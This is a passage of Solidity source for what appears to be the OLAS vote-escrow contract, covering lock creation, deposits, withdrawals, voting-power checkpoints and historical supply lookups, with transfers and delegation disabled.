(newLocked.endTime > block.timestamp && newLocked.endTime > oldLocked.endTime) { newDSlope -= uNew.slope; // old slope disappeared at this point mapSlopeChanges[newLocked.endTime] = newDSlope; // else: we recorded it already in oldDSlope } // Now handle user history uNew.ts = uint64(block.timestamp); uNew.blockNumber = uint64(block.number); uNew.balance = newLocked.amount; mapUserPoints[account].push(uNew); } } /// @dev Record global data to checkpoint. function checkpoint() external { _checkpoint(address(0), LockedBalance(0, 0), LockedBalance(0, 0), uint128(supply)); } /// @dev Deposits and locks tokens for a specified account. /// @param account Target address for the locked amount. /// @param amount Amount to deposit. /// @param unlockTime New time when to unlock the tokens, or 0 if unchanged. /// @param lockedBalance Previous locked amount / end time. /// @param depositType Deposit type. function _depositFor( address account, uint256 amount, uint256 unlockTime, LockedBalance memory lockedBalance, DepositType depositType ) internal { uint256 supplyBefore = supply; uint256 supplyAfter; // Cannot overflow because the total supply << 2^128-1 unchecked { supplyAfter = supplyBefore + amount; supply = supplyAfter; } // Get the old locked data LockedBalance memory oldLocked; (oldLocked.amount, oldLocked.endTime) = (lockedBalance.amount, lockedBalance.endTime); // Adding to the existing lock, or if a lock is expired - creating a new one // This cannot be larger than the total supply unchecked { lockedBalance.amount += uint128(amount); } if (unlockTime > 0) { lockedBalance.endTime = uint64(unlockTime); } mapLockedBalances[account] = lockedBalance; // Possibilities: // Both oldLocked.endTime could be current or expired (>/< block.timestamp) // amount == 0 (extend lock) or amount > 0 (add to lock or extend lock) // lockedBalance.endTime > block.timestamp (always) _checkpoint(account, oldLocked, lockedBalance, uint128(supplyAfter)); if (amount > 0) { // OLAS is a solmate-based ERC20 token with optimized transferFrom() that either returns true or reverts IERC20(token).transferFrom(msg.sender, address(this), amount); } emit Deposit(account, amount, lockedBalance.endTime, depositType, block.timestamp); emit Supply(supplyBefore, supplyAfter); } /// @dev Deposits `amount` tokens for `account` and adds to the lock. /// @dev Anyone (even a smart contract) can deposit for someone else, but /// cannot extend their locktime and deposit for a brand new user. /// @param account Account address. /// @param amount Amount to add. function depositFor(address account, uint256 amount) external { LockedBalance memory lockedBalance = mapLockedBalances[account]; // Check if the amount is zero if (amount == 0) { revert ZeroValue(); } // The locked balance must already exist if (lockedBalance.amount == 0) { revert NoValueLocked(account); } // Check the lock expiry if (lockedBalance.endTime < (block.timestamp + 1)) { revert LockExpired(msg.sender, lockedBalance.endTime, block.timestamp); } // Since in the _depositFor() we have the unchecked sum of amounts, this is needed to prevent unsafe behavior. // After 10 years, the inflation rate is 2% per year. It would take 220+ years to reach 2^96 - 1 total supply if (amount > type(uint96).max) { revert Overflow(amount, type(uint96).max); } _depositFor(account, amount, 0, lockedBalance, DepositType.DEPOSIT_FOR_TYPE); } /// @dev Deposits `amount` tokens for `msg.sender` and locks for `unlockTime`. /// @param amount Amount to deposit. /// @param unlockTime Time when tokens unlock, rounded down to a whole week. function createLock(uint256 amount, uint256 unlockTime) external { _createLockFor(msg.sender, amount, unlockTime); } /// @dev Deposits `amount` tokens for `account` and locks for `unlockTime`. /// @notice Tokens are taken from `msg.sender`'s balance. /// @param account Account address. /// @param amount Amount to deposit. /// @param unlockTime Time when tokens unlock, rounded down to a whole week. function createLockFor(address account, uint256 amount, uint256 unlockTime) external { // Check if the account address is zero if (account == address(0)) { revert ZeroAddress(); } _createLockFor(account, amount, unlockTime); } /// @dev Deposits `amount` tokens for `account` and locks for `unlockTime`. /// @notice Tokens are taken from `msg.sender`'s balance. /// @param account Account address. /// @param amount Amount to deposit. /// @param unlockTime Time when tokens unlock, rounded down to a whole week. function _createLockFor(address account, uint256 amount, uint256 unlockTime) private { // Check if the amount is zero if (amount == 0) { revert ZeroValue(); } // Lock time is rounded down to weeks // Cannot practically overflow because block.timestamp + unlockTime (max 4 years) << 2^64-1 unchecked { unlockTime = ((block.timestamp + unlockTime) / WEEK) * WEEK; } LockedBalance memory lockedBalance = mapLockedBalances[account]; // The locked balance must be zero in order to start the lock if (lockedBalance.amount > 0) { revert LockedValueNotZero(account, uint256(lockedBalance.amount)); } // Check for the lock time correctness if (unlockTime < (block.timestamp + 1)) { revert UnlockTimeIncorrect(account, block.timestamp, unlockTime); } // Check for the lock time not to exceed the MAXTIME if (unlockTime > block.timestamp + MAXTIME) { revert MaxUnlockTimeReached(account, block.timestamp + MAXTIME, unlockTime); } // After 10 years, the inflation rate is 2% per year. It would take 220+ years to reach 2^96 - 1 total supply if (amount > type(uint96).max) { revert Overflow(amount, type(uint96).max); } _depositFor(account, amount, unlockTime, lockedBalance, DepositType.CREATE_LOCK_TYPE); } /// @dev Deposits `amount` additional tokens for `msg.sender` without modifying the unlock time. /// @param amount Amount of tokens to deposit and add to the lock. function increaseAmount(uint256 amount) external { LockedBalance memory lockedBalance = mapLockedBalances[msg.sender]; // Check if the amount is zero if (amount == 0) { revert ZeroValue(); } // The locked balance must already exist if (lockedBalance.amount == 0) { revert NoValueLocked(msg.sender); } // Check the lock expiry if (lockedBalance.endTime < (block.timestamp + 1)) { revert LockExpired(msg.sender, lockedBalance.endTime, block.timestamp); } // Check the max possible amount to add, that must be less than the total supply // After 10 years, the inflation rate is 2% per year. It would take 220+ years to reach 2^96 - 1 total supply if (amount > type(uint96).max) { revert Overflow(amount, type(uint96).max); } _depositFor(msg.sender, amount, 0, lockedBalance, DepositType.INCREASE_LOCK_AMOUNT); } /// @dev Extends the unlock time. /// @param unlockTime New tokens unlock time. function increaseUnlockTime(uint256 unlockTime) external { LockedBalance memory lockedBalance = mapLockedBalances[msg.sender]; // Cannot practically overflow because block.timestamp + unlockTime (max 4 years) << 2^64-1 unchecked { unlockTime = ((block.timestamp + unlockTime) / WEEK) * WEEK; } // The locked balance must already exist if (lockedBalance.amount == 0) { revert NoValueLocked(msg.sender); } // Check the lock expiry if (lockedBalance.endTime < (block.timestamp + 1)) { revert LockExpired(msg.sender, lockedBalance.endTime, block.timestamp); } // Check for the lock time correctness if (unlockTime < (lockedBalance.endTime + 1)) { revert UnlockTimeIncorrect(msg.sender, lockedBalance.endTime, unlockTime); } // Check for the lock time not to exceed the MAXTIME if (unlockTime > block.timestamp + MAXTIME) { revert MaxUnlockTimeReached(msg.sender, block.timestamp + MAXTIME, unlockTime); } _depositFor(msg.sender, 0, unlockTime, lockedBalance, DepositType.INCREASE_UNLOCK_TIME); } /// @dev Withdraws all tokens for `msg.sender`. Only possible if the lock has expired. function withdraw() external { LockedBalance memory lockedBalance = mapLockedBalances[msg.sender]; if (lockedBalance.endTime > block.timestamp) { revert LockNotExpired(msg.sender, lockedBalance.endTime, block.timestamp); } uint256 amount = uint256(lockedBalance.amount); mapLockedBalances[msg.sender] = LockedBalance(0, 0); uint256 supplyBefore = supply; uint256 supplyAfter; // The amount cannot be less than the total supply unchecked { supplyAfter = supplyBefore - amount; supply = supplyAfter; } // oldLocked can have either expired <= timestamp or zero end // lockedBalance has only 0 end // Both can have >= 0 amount _checkpoint(msg.sender, lockedBalance, LockedBalance(0, 0), uint128(supplyAfter)); emit Withdraw(msg.sender, amount, block.timestamp); emit Supply(supplyBefore, supplyAfter); // OLAS is a solmate-based ERC20 token with optimized transfer() that either returns true or reverts IERC20(token).transfer(msg.sender, amount); } /// @dev Finds a closest point that has a specified block number. /// @param blockNumber Block to find. /// @param account Account address for user points. /// @return point Point with the approximate index number for the specified block. /// @return minPointNumber Point number. function _findPointByBlock(uint256 blockNumber, address account) internal view returns (PointVoting memory point, uint256 minPointNumber) { // Get the last available point number uint256 maxPointNumber; if (account == address(0)) { maxPointNumber = totalNumPoints; } else { maxPointNumber = mapUserPoints[account].length; if (maxPointNumber == 0) { return (point, minPointNumber); } // Already checked for > 0 in this case unchecked { maxPointNumber -= 1; } } // Binary search that will be always enough for 128-bit numbers for (uint256 i = 0; i < 128; ++i) { if ((minPointNumber + 1) > maxPointNumber) { break; } uint256 mid = (minPointNumber + maxPointNumber + 1) / 2; // Choose the source of points if (account == address(0)) { point = mapSupplyPoints[mid]; } else { point = mapUserPoints[account][mid]; } if (point.blockNumber < (blockNumber + 1)) { minPointNumber = mid; } else { maxPointNumber = mid - 1; } } // Get the found point if (account == address(0)) { point = mapSupplyPoints[minPointNumber]; } else { point = mapUserPoints[account][minPointNumber]; } } /// @dev Gets the voting power for an `account` at time `ts`. /// @param account Account address. /// @param ts Time to get voting power at. /// @return vBalance Account voting power. function _balanceOfLocked(address account, uint64 ts) internal view returns (uint256 vBalance) { uint256 pointNumber = mapUserPoints[account].length; if (pointNumber > 0) { PointVoting memory uPoint = mapUserPoints[account][pointNumber - 1]; uPoint.bias -= uPoint.slope * int128(int64(ts) - int64(uPoint.ts)); if (uPoint.bias > 0) { vBalance = uint256(int256(uPoint.bias)); } } } /// @dev Gets the account balance in native token. /// @param account Account address. /// @return balance Account balance. function balanceOf(address account) public view override returns (uint256 balance) { balance = uint256(mapLockedBalances[account].amount); } /// @dev Gets the `account`'s lock end time. /// @param account Account address. /// @return unlockTime Lock end time. function lockedEnd(address account) external view returns (uint256 unlockTime) { unlockTime = uint256(mapLockedBalances[account].endTime); } /// @dev Gets the account balance at a specific block number. /// @param account Account address. /// @param blockNumber Block number. /// @return balance Account balance. function balanceOfAt(address account, uint256 blockNumber) external view returns (uint256 balance) { // Find point with the closest block number to the provided one (PointVoting memory uPoint, ) = _findPointByBlock(blockNumber, account); // If the block number at the point index is bigger than the specified block number, the balance was zero if (uPoint.blockNumber < (blockNumber + 1)) { balance = uint256(uPoint.balance); } } /// @dev Gets the voting power. /// @param account Account address. function getVotes(address account) public view override returns (uint256) { return _balanceOfLocked(account, uint64(block.timestamp)); } /// @dev Gets the block time adjustment for two neighboring points. /// @notice `blockNumber` must not be lower than the contract deployment block number, /// as the behavior and the return value is undefined. /// @param blockNumber Block number. /// @return point Point with the specified block number (or closest to it). /// @return blockTime Adjusted block time of the neighboring point. function _getBlockTime(uint256 blockNumber) internal view returns (PointVoting memory point, uint256 blockTime) { // Check the block number to be in the past or equal to the current block if (blockNumber > block.number) { revert WrongBlockNumber(blockNumber, block.number); } // Get the minimum historical point with the provided block number uint256 minPointNumber; (point, minPointNumber) = _findPointByBlock(blockNumber, address(0)); uint256 dBlock; uint256 dt; if (minPointNumber < totalNumPoints) { PointVoting memory pointNext = mapSupplyPoints[minPointNumber + 1]; dBlock = pointNext.blockNumber - point.blockNumber; dt = pointNext.ts - point.ts; } else { dBlock = block.number - point.blockNumber; dt = block.timestamp - point.ts; } blockTime = point.ts; if (dBlock > 0) { blockTime += (dt * (blockNumber - point.blockNumber)) / dBlock; } } /// @dev Gets voting power at a specific block number. /// @param account Account address. /// @param blockNumber Block number. /// @return balance Voting balance / power. function getPastVotes(address account, uint256 blockNumber) public view override returns (uint256 balance) { // Find the user point for the provided block number (PointVoting memory uPoint, ) = _findPointByBlock(blockNumber, account); // Get block time adjustment. (, uint256 blockTime) = _getBlockTime(blockNumber); // Calculate bias based on a block time uPoint.bias -= uPoint.slope * int128(int64(uint64(blockTime)) - int64(uPoint.ts)); if (uPoint.bias > 0) { balance = uint256(uint128(uPoint.bias)); } } /// @dev Calculate total voting power at some point in the past. /// @param lastPoint The point (bias/slope) to start the search from. /// @param ts Time to calculate the total voting power at. /// @return vSupply Total voting power at that time. function _supplyLockedAt(PointVoting memory lastPoint, uint64 ts) internal view returns (uint256 vSupply) { // The timestamp is rounded and < 2^64-1 uint64 tStep = (lastPoint.ts / WEEK) * WEEK; for (uint256 i = 0; i < 255; ++i) { // This is always practically < 2^64-1 unchecked { tStep += WEEK; } int128 dSlope; if (tStep > ts) { tStep = ts; } else { dSlope = mapSlopeChanges[tStep]; } lastPoint.bias -= lastPoint.slope * int128(int64(tStep) - int64(lastPoint.ts)); if (tStep == ts) { break; } lastPoint.slope += dSlope; lastPoint.ts = tStep; } if (lastPoint.bias > 0) { vSupply = uint256(uint128(lastPoint.bias)); } } /// @dev Gets total token supply. /// @return Total token supply. function totalSupply() public view override returns (uint256) { return supply; } /// @dev Gets total token supply at a specific block number. /// @param blockNumber Block number. /// @return supplyAt Supply at the specified block number. function totalSupplyAt(uint256 blockNumber) external view returns (uint256 supplyAt) { // Find point with the closest block number to the provided one (PointVoting memory sPoint, ) = _findPointByBlock(blockNumber, address(0)); // If the block number at the point index is bigger than the specified block number, the balance was zero if (sPoint.blockNumber < (blockNumber + 1)) { supplyAt = uint256(sPoint.balance); } } /// @dev Calculates total voting power at time `ts`. /// @param ts Time to get total voting power at. /// @return Total voting power. function totalSupplyLockedAtT(uint256 ts) public view returns (uint256) { PointVoting memory lastPoint = mapSupplyPoints[totalNumPoints]; return _supplyLockedAt(lastPoint, uint64(ts)); } /// @dev Calculates current total voting power. /// @return Total voting power. function totalSupplyLocked() public view returns (uint256) { return totalSupplyLockedAtT(block.timestamp); } /// @dev Calculate total voting power at some point in the past. /// @param blockNumber Block number to calculate the total voting power at. /// @return Total voting power. function getPastTotalSupply(uint256 blockNumber) public view override returns (uint256) { (PointVoting memory sPoint, uint256 blockTime) = _getBlockTime(blockNumber); // Now dt contains info on how far are we beyond the point return _supplyLockedAt(sPoint, uint64(blockTime)); } /// @dev Gets information about the interface support. /// @param interfaceId A specified interface Id. /// @return True if this contract implements the interface defined by interfaceId. function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { return interfaceId == type(IERC20).interfaceId || interfaceId == type(IVotes).interfaceId || interfaceId == type(IERC165).interfaceId; } /// @dev Reverts the transfer of this token. function transfer(address to, uint256 amount) external virtual override returns (bool) { revert NonTransferable(address(this)); } /// @dev Reverts the approval of this token. function approve(address spender, uint256 amount) external virtual override returns (bool) { revert NonTransferable(address(this)); } /// @dev Reverts the transferFrom of this token. function transferFrom(address from, address to, uint256 amount) external virtual override returns (bool) { revert NonTransferable(address(this)); } /// @dev Reverts the allowance of this token. function allowance(address owner, address spender) external view virtual override returns (uint256) { revert NonTransferable(address(this)); } /// @dev Reverts delegates of this token. function delegates(address account) external view virtual override returns (address) { revert NonDelegatable(address(this)); } /// @dev Reverts delegate for this token. function delegate(address delegatee) external virtual override { revert NonDelegatable(address(this)); } /// @dev Reverts delegateBySig for this token. function delegateBySig(address delegatee, uint256 nonce, uint256 expiry, uint8 v, bytes32 r, bytes32 s) external virtual override { revert NonDelegatable(address(this)); } }